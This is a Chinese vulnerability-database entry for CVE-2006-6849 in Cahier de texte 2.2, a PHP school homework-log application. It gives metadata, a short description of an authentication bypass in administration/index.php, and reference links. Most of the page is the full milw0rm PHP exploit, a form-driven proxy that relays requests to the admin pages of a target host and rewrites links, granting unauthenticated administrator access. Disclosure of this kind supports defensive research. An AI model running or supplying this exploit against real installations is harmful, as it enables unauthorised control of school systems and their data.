Cahier de texte 'index.php' 未授权安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111877 漏洞类型 未知
发布时间 2006-12-26 更新时间 2006-12-31
CVE编号 CVE-2006-6849 CNNVD-ID CNNVD-200612-719
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3016
https://www.securityfocus.com/bid/87115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-719
|漏洞详情
Cahierdetexte(CDT)中的administration/index.php当认证失败时未正确退出,远程攻击者可以执行未授权管理员操作。
|漏洞EXP
<?
/*

  Informations
  ============
  Affected.scr..: Cahier de texte V2.2 (last version)
  Poc.ID........: 17061224
  Type..........: Bypass general access restriction
  Risk.level....: High
  Conditions....: None
  Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_de_texte/
  Poc.link......: acid-root.new.fr/poc/17061224.txt
  Credits.......: DarkFig

  Vulnerable code
  ===============
  <?php session_start();
  if (isset($_SESSION['nom_prof'])) { 
  if ($_SESSION['nom_prof']<>'Administrateur') { header("Location: ../index.php");}
  ;} else { header("Location: ../index.php");}?>
  ...

*/

if(!isset($_GET['host']) || empty($_GET['host'])) headers();
if(!isset($_GET['wanted'])) $wanted = 'index.php';

$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
echo sockxp($host,$path,$prox,"administration/".$wanted);
exit(0);

function headers()
{
	print("<html>
<head>
 <title>Cahier de texte V2.2 Exploit</title>
</head>
<body>
 <form method='get' action='".$_SERVER['PHP_SELF']."'>
  <input type='text' name='host' value='host'>
  <input type='text' name='path' value='path'>
  <input type='text' name='prox' value='proxyhost:proxyport'>
  <input type='submit' value='Exploit'>
 </form>
</body>
</html>");
	exit(0);
}

function sockxp($host,$path,$prox,$wanted)
{
	$hope = !empty($prox) ? $prox : $host.':80';
	preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta);
	$hosh = $hosta[1];
	$hosp = $hosta[2];
	
	$recv = '';
	$meth = $_SERVER['REQUEST_METHOD'];
	if(empty($hosh) || empty($hosp)) exit(1);

	if(!$sock = fsockopen($hosh,$hosp)) exit(1);
	$dat  = $meth." http://".$host;
	
	if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted);
	else $dat .= $path.$wanted;
	
	$dat .= " HTTP/1.1\r\n";
	$dat .= "Host: $host\r\n";
	$dat .= "Connection: Close\r\n";
	
	if($meth === "POST") {
		$postdata = get_postdata();
		$dat .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n";
		$dat .= $postdata."\r\n\r\n";
	} else {
		$dat .= "\r\n";
	}

	fputs($sock,$dat);
	while(!feof($sock)) $recv .= fgets($sock);
	fclose($sock);

	return html_replace($recv);
}

function html_replace($htmlc)
{
	global $host,$path,$prox;
	$iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted=";
	$newc = str_replace("action=\"","action=\"$iniv",$htmlc);
	$newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc);
	$newc = str_replace("a href=\"","a href=\"$iniv",$newc);
	$newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc);
	$newc = explode("\n",$newc);
	for($i=1;$i<count($newc);$i++) {
		if(!preg_match("/(\S*):/",$newc[$i])) $v=1;
		if($v) $nnewc .= $newc[$i]."\n";
	}
	return $nnewc;
}

function get_postdata()
{
	$postdata = '';
	foreach($_POST as $key => $value) {
		$postdata .= $key."=".$value."&";
	}
	return $postdata;
}
?>

# milw0rm.com [2006-12-26]
|受影响的产品
Cahier de textes Cahier de textes 2.2
|参考资料

来源:BUGTRAQ
名称:20061224CahierdetexteV2.2Bypassgeneralaccessprotectionexploit
链接:http://www.securityfocus.com/archive/1/archive/1/455299/100/0/threaded
来源:MISC
链接:http://acid-root.new.fr/poc/17061224.txt
来源:XF
名称:cahierdetexte-index-security-bypass(31132)
链接:http://xforce.iss.net/xforce/xfdb/31132
来源:MILW0RM
名称:3016
链接:http://www.milw0rm.com/exploits/3016
来源:MILW0RM
名称:3016
链接:http://milw0rm.com/exploits/3016